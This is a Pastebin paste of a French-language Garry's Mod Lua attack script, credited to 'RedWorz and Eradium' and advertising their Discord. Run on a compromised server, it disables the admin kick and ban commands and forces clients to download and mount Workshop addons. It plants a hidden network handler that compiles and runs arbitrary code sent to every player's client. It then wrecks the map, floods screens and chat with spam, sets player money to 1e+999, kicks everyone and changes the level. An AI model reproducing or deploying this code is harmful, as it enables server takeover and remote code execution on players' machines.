Advertisement
Guest User

Untitled

a guest
Apr 1st, 2020
308
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.51 KB | None | 0 0
  1. -- Base repris de "She Want me dead"
  2.  
  3. -- Avec l'autorisation de "LeSheitan17" et de Eradium
  4.  
  5. -- https://discord.gg/K3pcvG <---- La planète des haxor
  6.  
  7. -- Props crée par Axeljefire
  8.  
  9. print([[
  10. ██████╗ ███████╗██████╗ ██╗ ██╗ ██████╗ ██████╗ ███████╗
  11. ██╔══██╗██╔════╝██╔══██╗██║ ██║██╔═══██╗██╔══██╗╚══███╔╝
  12. ██████╔╝█████╗ ██║ ██║██║ █╗ ██║██║ ██║██████╔╝ ███╔╝
  13. ██╔══██╗██╔══╝ ██║ ██║██║███╗██║██║ ██║██╔══██╗ ███╔╝
  14. ██║ ██║███████╗██████╔╝╚███╔███╔╝╚██████╔╝██║ ██║███████╗
  15. ╚═╝ ╚═╝╚══════╝╚═════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝
  16. By RedWorz and Eradium ]])
  17.  
  18. for k, v in pairs(player.GetAll()) do
  19. v:SendLua("steamworks.FileInfo(1916383732,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  20. v:SendLua("steamworks.FileInfo(1911711876,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  21. v:SendLua("steamworks.FileInfo(1830594533,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  22. v:ConCommand("say /job Remercier RedWorz pour se beaux visuel <3")
  23. end
  24.  
  25. local nothing = function() end
  26.  
  27. if ULib then
  28. ULib.kick = nothing
  29. ULib.ban = nothing
  30. ULib.addBan = nothing
  31. end
  32.  
  33. if FAdmin then
  34.  
  35. local tbl = {
  36. "kick",
  37. "ban",
  38. "jail",
  39. "UnJail",
  40. "ClearDecals",
  41. "StopSounds",
  42. "CleanUp"
  43. }
  44. for i=1, #tbl do
  45. FAdmin.Commands.AddCommand(tbl[i], nothing)
  46. end
  47.  
  48. end
  49.  
  50. local sun = ents.FindByClass("env_sun")
  51. if #sun == 0 then return end
  52.  
  53. sun = sun[1]
  54.  
  55. hook.Add("Think","\xFFsun\xFF",function()
  56. sun:SetKeyValue("sun_dir", math.sin(CurTime())/3 .. " " .. math.cos(CurTime())/3 .. " 0.901970")
  57. sun:SetModelScale(120)
  58. end)
  59.  
  60. function game.CleanUpMap() return false end
  61.  
  62. timer.Create("NnoMoreVehicle", 1, 0, function()
  63. for k,v in pairs(ents.FindByClass("prop_vehicle*")) do
  64. v:Remove()
  65. end
  66. end)
  67.  
  68. timer.Simple(1,function()
  69. for k,v in pairs(player.GetAll()) do
  70. v:StripWeapons()
  71. end
  72. end)
  73.  
  74. timer.Simple(2,function()
  75. for k,v in pairs(player.GetAll()) do
  76. v:Give( "weapon_physgun" )
  77. end
  78. end)
  79.  
  80. hook.Add( 'SetupMove', 'Lapin', function( ply, move )
  81. if not ply:IsOnGround() then
  82. move:SetButtons( bit.band( move:GetButtons(), bit.bnot( IN_JUMP ) ) )
  83. end
  84. end )
  85.  
  86. game.AddParticles( "particles/kpanel.pcf" )
  87. PrecacheParticleSystem("kpanel")
  88.  
  89. util.AddNetworkString("faitleserv")
  90. local props2 = ents.GetAll()
  91. for _, prop in ipairs( props2 ) do
  92. if(prop:GetPhysicsObject():IsValid()) then
  93. prop:SetModel("models/cube/r.mdl")
  94. prop:SetMaterial("phoenix_storms/Fender_white.vtf")
  95. prop:SetColor(0,0,0)
  96. end
  97. end
  98.  
  99.  
  100. timer.Create("LeSheitanFaisMonCodeCarIlEstTropBeau"..math.random(500,50000), 1.5, 0, function()
  101. local props2 = ents.GetAll()
  102. for _, prop in ipairs( props2 ) do
  103. if(prop:GetPhysicsObject():IsValid()) then
  104. if(prop:GetModel() == "models/cube/r.mdl") then else
  105. prop:SetModel("models/cube/r.mdl")
  106. prop:SetMaterial("phoenix_storms/Fender_white.vtf")
  107. prop:SetColor(0,0,0)
  108. end
  109. end
  110. end
  111. end)
  112.  
  113. local function rdm_str(len)
  114. if not len or len <= 0 then
  115. return ''
  116. end
  117. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  118. end
  119.  
  120. local net_string = rdm_str(25)
  121. util.AddNetworkString(net_string)
  122. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  123. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  124. if not ply:IsBot() then
  125. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  126. end
  127. end)
  128.  
  129. local function EradiumToClient(code)
  130. local data = util.Compress(code)
  131. local len = #data net.Start(net_string)
  132. net.WriteUInt(len, 16)
  133. net.WriteData(data, len)
  134. net.Broadcast()
  135. end
  136.  
  137. timer.Simple( 1, function()
  138.  
  139. EradiumToClient([=[
  140. -- Base repris de "She Want me dead"
  141.  
  142. -- Avec l'autorisation de "LeSheitan17" et de Eradium
  143.  
  144. -- https://discord.gg/K3pcvG <---- La planète des haxor
  145.  
  146. -- Props crée par Axeljefire
  147.  
  148. print([[
  149. ██████╗ ███████╗██████╗ ██╗ ██╗ ██████╗ ██████╗ ███████╗
  150. ██╔══██╗██╔════╝██╔══██╗██║ ██║██╔═══██╗██╔══██╗╚══███╔╝
  151. ██████╔╝█████╗ ██║ ██║██║ █╗ ██║██║ ██║██████╔╝ ███╔╝
  152. ██╔══██╗██╔══╝ ██║ ██║██║███╗██║██║ ██║██╔══██╗ ███╔╝
  153. ██║ ██║███████╗██████╔╝╚███╔███╔╝╚██████╔╝██║ ██║███████╗
  154. ╚═╝ ╚═╝╚══════╝╚═════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝
  155. By RedWorz and Eradium ]])
  156.  
  157. game.AddParticles( "particles/kpanel.pcf" )
  158. PrecacheParticleSystem("kpanel")
  159.  
  160. local defaultfov = LocalPlayer():GetFOV()
  161. local override = 70 hook.Add("CalcView", "EXROR_", function(ply, origin, angles, fov, znear, zfar) return { ["origin"] = origin, ["angles"] = angles, ["fov"] = override, ["znear"] = znear, ["zfar"] = zfar }
  162. end)
  163. local hide = { ["CHudHealth"] = true, ["CHudCrosshair"] = true }
  164. hook.Add( "HUDShouldDraw", "HideHUD", function( name ) if ( hide[ name ] ) then return false end
  165. end )
  166.  
  167. local gfx = {}
  168. local prevFrame = {}
  169. local prevValue = 2
  170. local aveclazicmu = {}
  171. hook.Add("HUDPaint", "MesOreillesSaleFilsDePute",function()
  172. for k,v in pairs(aveclazicmu) do v() end
  173. end)
  174. SOUNDSTART_CTP = false
  175. OZJFOZJCEZIO = true
  176.  
  177. sound.PlayURL("https://www.cjoint.com/doc/20_03/JCFp3qlMOOR_none.mp3","mono noblock noplay",function(s)
  178. if not s then return end
  179. if SOUNDSTART_CTP then s:Stop() return end
  180. SOUNDSTART_CTP = true
  181. s:SetVolume(6.5)
  182. s:Play()
  183.  
  184. local ragtbl = {}
  185. aveclazicmu["CoolEffect"] = function()
  186. local tbl = {} s:FFT(tbl,FFT_4096) xpcall(function()
  187. local fal = 0 for i=1,40 do
  188. fal = fal + tbl[i] end
  189. prevValue = Lerp(30 * FrameTime(), prevValue, fal) if fal > 2 then
  190. override = Lerp(10 * FrameTime(), override, fal * .875)
  191. net.Start("faitleserv") net.SendToServer()
  192. else
  193. override = Lerp(5 * FrameTime(), override, defaultfov)
  194. sent = false
  195. end
  196. end,function()
  197. end)
  198.  
  199. timer.Simple(30, function()
  200. gfx["CoolEffect"] = function()
  201. local tbl = {}
  202. s:FFT(tbl,FFT_2048)
  203. local fal = 0
  204.  
  205. for i=4,6 do
  206. fal = fal + tbl[i]
  207. end
  208.  
  209. if fal > 0.8 then
  210. local ca = Color(math.random(0,255),math.random(0,255),math.random(0,255), 150)
  211. util.ScreenShake(LocalPlayer():GetPos(),20,20,0.5,20)
  212.  
  213. local mats = Entity(0):GetMaterials()
  214. for k,v in pairs(mats) do
  215. local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50
  216. Material(v):SetVector("$color", Vector(r,g,b))
  217. Material(v):SetTexture( "$basetexture", "_rt_fullframefb" )
  218. end
  219. end
  220. end
  221.  
  222. end)
  223.  
  224. end
  225.  
  226. end)
  227.  
  228. timer.Simple(31, function()
  229.  
  230. hook.Add("HUDPaint", "PutainMaBiteLacheDuSpermSurTonServeur",function()
  231.  
  232. for k,v in pairs(gfx) do
  233.  
  234. v()
  235.  
  236. end
  237.  
  238. end)
  239.  
  240. end)
  241.  
  242. ]=])
  243. end)
  244.  
  245. timer.Simple( 1, function()
  246.  
  247. EradiumToClient([[
  248. surface.CreateFont( "PixelCutsceneScaled",{ font = "Open Sans", size = 500, weight = 1000, antialias = true })
  249. surface.CreateFont( "PixelCutsceneScaledSmall",{ font = "Open Sans", size = 50, weight = 1000, antialias = true })
  250. surface.CreateFont( "PixelSmall",{ font = "Open Sans", size = 135, weight = 500, antialias = false })
  251. surface.CreateFont("lapolice", { font = "Open Sans", size = ScrW()*0.02, weight = 10, blursize = 0, scanlines = 2.5, antialias = false })
  252. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local w,h = ScrW(), ScrH() local W, H = ScrW(), ScrH()
  253. local MySelf = LocalPlayer()
  254. if kpderma then kpderma:Remove()
  255. kpderma = nil end
  256. kpderma = vgui.Create( "DFrame" )
  257. kpderma:SetSize( w, h )
  258. kpderma:SetPos(0,0)
  259. kpderma:SetDraggable ( false )
  260. kpderma:SetTitle("")
  261. kpderma:ShowCloseButton(false)
  262. kpderma.Paint = function( self )
  263. surface.SetDrawColor(30, 30, 30, 0)
  264. end
  265.  
  266. local pw, ph = w, h*0.6 local px, py = w/2-pw/2, h/2-ph/2
  267. local RedWorz = vgui.Create( "DButton", kpderma )
  268. RedWorz:SetPos(px, py)
  269. RedWorz:SetText( "" )
  270. RedWorz:SetSize( pw, ph )
  271. RedWorz.Paint = function( self, tw, th )
  272. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8)
  273. local shift = math.sin(RealTime()*3)*1.5 + 5
  274. local text2 = "Admirer <3"
  275. draw.SimpleText( text2, "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  276. draw.SimpleText( text2, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color( 0, 191, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  277. end
  278.  
  279.  
  280. timer.Simple(2, function()
  281. notification.AddLegacy( "N'ayez pas peur, votre serveur ne sera pas endommagé", 3, 10 )
  282. notification.AddLegacy( "Ce spam visuel se supprimera automatiquement", 2, 10 )
  283. surface.PlaySound( "buttons/button15.wav" )
  284. end)
  285.  
  286. timer.Simple( 25, function()
  287.  
  288. RedWorz.Paint = function( self, tw, th )
  289. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8)
  290. local shift = math.sin(RealTime()*3)*1.5 + 5
  291. local text = "RedWorz" local down = [=[ Eradium is god <3 ]=]
  292. draw.SimpleText( down, "PixelCutsceneScaledSmall", tw/2 , th/2 +100, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER) draw.SimpleText( down, "PixelCutsceneScaledSmall", tw/2 - shift , th/2 +100 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  293. draw.SimpleText( text, "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER) draw.SimpleText( text, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color( 0, 191, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  294. end
  295.  
  296. for k, v in pairs(player.GetAll()) do
  297. v:ConCommand("r_shader_srgb 1")
  298. end
  299.  
  300. end)
  301.  
  302. timer.Simple( 35, function()
  303.  
  304. for i = 1, 10 do
  305. ParticleEffectAttach("kpanel",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  306. end
  307.  
  308. RedWorz.Paint = function( self, tw, th )
  309. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8)
  310. local shift = math.sin(RealTime()*3)*1.5 + 5
  311. local text2 = "RedWorz"
  312. draw.SimpleText( text2, "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  313. draw.SimpleText( text2, "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color( 75, 0, 130), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  314. end
  315.  
  316.  
  317. end)
  318.  
  319. timer.Simple( 95, function()
  320.  
  321. RedWorz.Paint = function( self, tw, th )
  322.  
  323. end
  324.  
  325. function GAMEMODE:PostDraw2DSkyBox()
  326. local col = Color( 75, 0, 130)
  327. render.Clear(col.r/1.3, col.g/1.3, col.b/1.3, 255)
  328. return !!1
  329. end
  330. function GAMEMODE:PreDrawSkyBox()
  331. local col = Color( 75, 0, 130)
  332. render.Clear(col.r/1.3, col.g/1.3, col.b/1.3, 255)
  333. return !!1
  334. end
  335.  
  336. timer.Create("spamchatbienchiant", 1.5, 0, function()
  337. local time = tonumber(0)
  338. local Message = {
  339. "- https://discord.gg/K3pcvG -",
  340. "-- https://discord.gg/K3pcvG --",
  341. "--- https://discord.gg/K3pcvG ---",
  342. "---- https://discord.gg/K3pcvG ----",
  343. "----- https://discord.gg/K3pcvG -----",
  344. "------ https://discord.gg/K3pcvG ------",
  345. "------- https://discord.gg/K3pcvG -------",
  346. "-------- https://discord.gg/K3pcvG --------",
  347. "--------- https://discord.gg/K3pcvG ---------",
  348. "-------- https://discord.gg/K3pcvG --------",
  349. "------- https://discord.gg/K3pcvG -------",
  350. "------ https://discord.gg/K3pcvG ------",
  351. "----- https://discord.gg/K3pcvG -----",
  352. "---- https://discord.gg/K3pcvG ----",
  353. "--- https://discord.gg/K3pcvG ---",
  354. "-- https://discord.gg/K3pcvG --",
  355. "- https://discord.gg/K3pcvG -",
  356. }
  357.  
  358. for _, line in pairs(Message) do
  359. time = time + tonumber(0.1)
  360. timer.Simple(time,function()
  361. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  362. end)
  363. end
  364. end)
  365.  
  366. timer.Create("redworz", 0.3, 0, function()
  367. notification.AddLegacy( "Planète des haxors <3", math.random(0, 4), 1.5 )
  368. end)
  369.  
  370. timer.Create("ixxe", 0.3, 0, function()
  371. notification.AddLegacy( "Eradium et RedWorz <3", math.random(0, 4), 1.5 )
  372. end)
  373.  
  374. timer.Create("eradium", 0.3, 0, function()
  375. notification.AddLegacy( "Eradium <3", math.random(0, 4), 1.5 )
  376. end)
  377.  
  378. timer.Create("shy", 0.3, 0, function()
  379. notification.AddLegacy( "RedWorz <3", math.random(0, 4), 1.5 )
  380. end)
  381.  
  382. timer.Create("estemaz", 0.3, 0, function()
  383. notification.AddLegacy( "Vegetto <3", math.random(0, 4), 1.5 )
  384. end)
  385.  
  386. timer.Create("ElFamosoHaxorSheitan", 0.3, 0, function()
  387. notification.AddLegacy( "El Famoso LeSheitan17 <3", math.random(0, 4), 1.5 )
  388. end)
  389.  
  390. timer.Create("skeleton", 0.3, 0, function()
  391. notification.AddLegacy( "Exoevel <3", math.random(0, 4), 1.5 )
  392. end)
  393.  
  394.  
  395. timer.Create("kPanelDoorciel", 1, 99,function()
  396.  
  397. local EraPorn = ClientsideModel("models/cube/r.mdl")
  398. EraPorn:SetMaterial("phoenix_storms/Fender_white.vtf")
  399. EraPorn:SetNoDraw(true)
  400. EraPorn:SetModelScale(20)
  401. timer.Create("charglogo", 0.01, 0, function()
  402. EraPorn:SetAngles(Angle(0, CurTime()*50 % 360 ,CurTime()*20 % 360) )
  403. end)
  404. local data = {}
  405. local function genEraPorn(id)
  406. local pos = LocalPlayer():GetPos()
  407. data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  408. end
  409.  
  410. for i=1, 50 do
  411. genEraPorn(i)
  412. end
  413.  
  414. hook.Add("PostDrawOpaqueRenderables","FilsDeViol",function()
  415. local z = LocalPlayer():GetPos().z
  416. for i=1, #data do
  417. EraPorn:SetPos(data[i][1])
  418. EraPorn:SetupBones()
  419. EraPorn:DrawModel()
  420. data[i][1].z = data[i][1].z - data[i][2] / 20
  421. if data[i][1].z <= z then
  422. genEraPorn(i)
  423. end
  424. end
  425. end)
  426. end)
  427.  
  428. end)
  429.  
  430. ]])
  431.  
  432. hook.Add("Think","AllahEstMonDaron",function()
  433. local col = HSVToColor(CurTime() * 50 % 360, 1, 1)
  434.  
  435. for _, v in ipairs(player.GetAll()) do
  436. v:SetWeaponColor(Vector(col.r / 255, col.g / 255, col.b / 255))
  437. end
  438.  
  439. end)
  440.  
  441. end)
  442.  
  443. timer.Simple( 100, function()
  444.  
  445. EradiumToClient([[
  446.  
  447.  
  448. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local w,h = ScrW(), ScrH() local W, H = ScrW(), ScrH()
  449. local MySelf = LocalPlayer()
  450. if kpderma then kpderma:Remove()
  451. kpderma = nil end
  452. kpderma = vgui.Create( "DFrame" )
  453. kpderma:SetSize( w, h )
  454. kpderma:SetPos(0,0)
  455. kpderma:SetDraggable ( false ) 3
  456. kpderma:SetTitle("")
  457. kpderma:ShowCloseButton(false)
  458. kpderma.Paint = function( self )
  459. surface.SetDrawColor(30, 30, 30, 0)
  460. end
  461.  
  462. local pw, ph = w, h*0.6 local px, py = w/2-pw/2, h/2-ph/2
  463. local RedWorz = vgui.Create( "DButton", kpderma )
  464. RedWorz:SetPos(px, py)
  465. RedWorz:SetText( "" )
  466. RedWorz:SetSize( pw, ph )
  467. RedWorz.Paint = function( self, tw, th )
  468. local coltext = HSVToColor(CurTime() * 36 % 360, .3, .8) local shift = math.sin(RealTime()*3)*1.5 + 5
  469. local text = { "RedWorz", "REworz", "R3dWorz", "R3dWorz", "R3dW0rz", "R3dWo‚¬z", "R3dW0r‚¬z", "RedW0r‚¬z", "ReDwOrZ", "REDWORZ", "ERROR", }
  470. hook.Add( "Think", "omgilawinlebogos", function() plyk,plyv = table.Random(player.GetAll()) end)
  471. draw.SimpleText( "https://discord.gg/K3pcvG", "PixelCutsceneScaledSmall", tw/2 , th/2 +100, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  472. draw.SimpleText( "https://discord.gg/K3pcvG", "PixelCutsceneScaledSmall", tw/2 - shift , th/2 +100 - shift, Color(math.random(240,255), math.random(240,255), math.random(240,255), 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  473. draw.SimpleText( table.Random(text), "PixelCutsceneScaled", tw/2 , th/2, coltext, TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER) draw.SimpleText( table.Random(text), "PixelCutsceneScaled", tw/2 - shift , th/2 - shift, Color( 0, 191, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  474. end
  475.  
  476. timer.Create("MaBiteEstDur", 0.1, 0, function()
  477. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  478. end)
  479.  
  480. hook.Add( "HUDPaint", "truckde merde", function()
  481. draw.DrawText( "RedWorz", "lapolice", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 0,191,255, math.random(230,255) ), TEXT_ALIGN_CENTER )
  482. draw.DrawText( "RedWorz", "lapolice", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  483. draw.DrawText( "RedWorz", "lapolice", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  484. draw.DrawText( "RedWorz", "lapolice", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  485. draw.DrawText( "RedWorz", "lapolice", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  486. draw.DrawText( "RedWorz", "lapolice", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  487. draw.DrawText( "RedWorz", "lapolice", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  488. draw.DrawText( "RedWorz", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  489. draw.DrawText( "RedWorz", "lapolice", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  490. draw.DrawText( "RedWorz", "lapolice", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  491. draw.DrawText( "RedWorz", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  492. draw.DrawText( "RedWorz", "lapolice", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  493. draw.DrawText( "RedWorz", "lapolice", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  494. draw.DrawText( "RedWorz", "lapolice", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  495. draw.DrawText( "RedWorz", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  496. draw.DrawText( "RedWorz", "lapolice", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  497. draw.DrawText( "RedWorz", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  498. draw.DrawText( "RedWorz", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  499. draw.DrawText( "RedWorz", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 0, 191, 255, math.random(230,255) ), 0 )
  500. end)
  501.  
  502.  
  503. ]])
  504.  
  505.  
  506.  
  507. end)
  508.  
  509. timer.Simple( 186, function()
  510.  
  511. for i,v in ipairs(player.GetAll()) do
  512. if v == p then continue end
  513. v:Kick("RedWorz discord la planète des haxors:( https://discord.gg/K3pcvG )")
  514. end
  515.  
  516. end)
  517.  
  518. timer.Simple( 5, function()
  519. RunConsoleCommand("ulx", "god", "*")
  520. end)
  521.  
  522. timer.Create("SpeedHackActived", 5, 1, function()
  523. RunConsoleCommand("sv_friction", "-50")
  524. RunConsoleCommand("sv_gravity", "300")
  525. end)
  526.  
  527. timer.Simple( 189, function()
  528. RunConsoleCommand("sv_friction", "8")
  529. RunConsoleCommand("sv_gravity", "600")
  530. RunConsoleCommand("changelevel", "gm_construct")
  531. end)
  532.  
  533. local untitled_ = { "REDWORZ", "R3DWORZ", "R3DW0R‚¬z","R3dw0r‚¬z" }
  534.  
  535. for k, v in pairs(player.GetAll()) do
  536. timer.Create("charglogo", 0, 0, function()
  537. v:setDarkRPVar("job", "JOB_"..table.Random( untitled_ )) v:setDarkRPVar("money", "1e+999")
  538. end)
  539. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement